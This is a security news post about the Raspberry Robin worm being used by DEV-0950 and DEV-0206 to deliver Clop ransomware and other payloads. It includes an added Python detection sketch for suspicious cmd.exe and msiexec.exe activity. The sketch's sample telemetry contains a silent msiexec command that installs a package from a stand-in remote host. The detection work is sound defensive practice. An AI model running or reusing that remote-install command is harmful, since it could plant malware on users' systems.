November 9, 2022 - TuxCare expert team
A hacker group identified simply as DEV-0950 is using Clop ransomware to encrypt the networks of organizations that were previously infected with the Raspberry Robin worm.
Raspberry Robin is a Windows worm that spreads via removable USB devices. It uses the Windows Installer to reach QNAP-associated domains and download a malicious DLL, and falls back on Tor exit nodes as backup C2 infrastructure.
The malware uses cmd.exe to read and execute a file stored on the infected external drive. It then leverages msiexec.exe for outbound network communication to a rogue domain, which serves as the C2 from which the DLL library file is downloaded and installed.
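As an added illustration (not code from the TuxCare post or from Microsoft), the following Python sketch turns the two behaviours just described into detection heuristics over constructed Sysmon-style process-creation and network-connection events. The removable drive letters, field names, hostnames and sample values are assumptions made for the demonstration.

```python
import ipaddress
import re

# Heuristics for the behaviours the post describes: cmd.exe executing a file from a removable
# drive, and msiexec.exe fetching a package from or connecting to an external host (Sysmon EventID 1/3).
REMOVABLE_DRIVES = {"E:", "F:"}  # assumed: volume letters the endpoint agent reports as removable
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
DRIVE_RE = re.compile(r"(?<![A-Za-z0-9])([A-Za-z]):\\")
URL_RE = re.compile(r"https?://([^/\s:]+)", re.IGNORECASE)

def host_is_external(host: str) -> bool:
    """Hostnames and non-RFC1918/loopback/link-local IPs count as external."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return bool(host)  # a DNS name (or empty string -> not a host at all)
    return not any(addr in net for net in INTERNAL_NETS)

def classify(event: dict):
    """Return a finding label if the event matches one of the patterns, else None."""
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "")
    if event.get("EventID") == 1 and image.endswith("\\cmd.exe"):
        # cmd.exe reading/executing a file that lives on a removable volume
        drives = {d.upper() + ":" for d in DRIVE_RE.findall(cmdline)}
        if drives & REMOVABLE_DRIVES:
            return "cmd_exec_from_removable_drive"
    if image.endswith("\\msiexec.exe"):
        if event.get("EventID") == 1:
            m = URL_RE.search(cmdline)  # msiexec told to install a package from a remote URL
            if m and host_is_external(m.group(1)):
                return "msiexec_remote_package"
        if event.get("EventID") == 3 and host_is_external(event.get("DestinationIp", "")):
            return "msiexec_external_connection"
    return None

# Constructed sample telemetry (not real logs); hosts use documentation ranges and .invalid.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"cmd.exe /c E:\setup\run.bat"},
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /q /i http://update.example.invalid/pkg.msi"},
    {"EventID": 3, "Image": r"C:\Windows\System32\msiexec.exe", "DestinationIp": "203.0.113.10"},
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe", "CommandLine": r"msiexec.exe /i C:\temp\app.msi"},
    {"EventID": 3, "Image": r"C:\Windows\System32\msiexec.exe", "DestinationIp": "10.0.0.5"},
]

def scan(events: list) -> list:  # (EventID, label) for each event that triggers a finding
    return [(e["EventID"], label) for e in events if (label := classify(e)) is not None]
```

Benign msiexec use (local package, internal destination) produces no finding; in production the internal ranges and removable-drive inventory would come from the endpoint agent rather than constants.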
Although the malware was used in post-compromise activity linked to DEV-0950, data collected by Microsoft Defender for Endpoint shows that nearly 3,500 devices in nearly 1,000 organizations had at least one Raspberry Robin payload-related alert in the last 30 days.
The attacks carried out by DEV-0950 culminated in the deployment of a Cobalt Strike beacon. In other cases, the attackers delivered Truebot malware between the Raspberry Robin infection and the Cobalt Strike deployment. Investigations further show that experts observed worm infections delivering IcedID, Bumblebee and TrueBot payloads starting on September 19, 2022, with the last stage of the attack being the deployment of the Clop ransomware.
However, DEV-0950 is not the only threat actor to leverage Raspberry Robin infections to launch ransomware attacks on organizations. Researchers observed the spread of FakeUpdates via Raspberry Robin malware. According to Microsoft researchers, another threat actor, identified as DEV-0206, was responsible for using the worm to deploy a downloader on networks controlled by threat actors with Evil Corp TTPs.
The researchers explained that DEV-0206 is an access broker that uses malware advertising campaigns to compromise corporate networks.
“DEV-0950 traditionally uses phishing to acquire the majority of their victims, so this notable shift to using Raspberry Robin enables them to deliver payloads to existing infections and move their campaigns more quickly to ransomware stages. Given the interconnected nature of the cybercriminal economy, it is possible that the actors behind these Raspberry Robin-related malware campaigns, usually distributed through other means like malicious ads or email, are paying the Raspberry Robin operators for malware installs,” reads the report published by Microsoft.
The sources for this piece include an article in SecurityAffairs.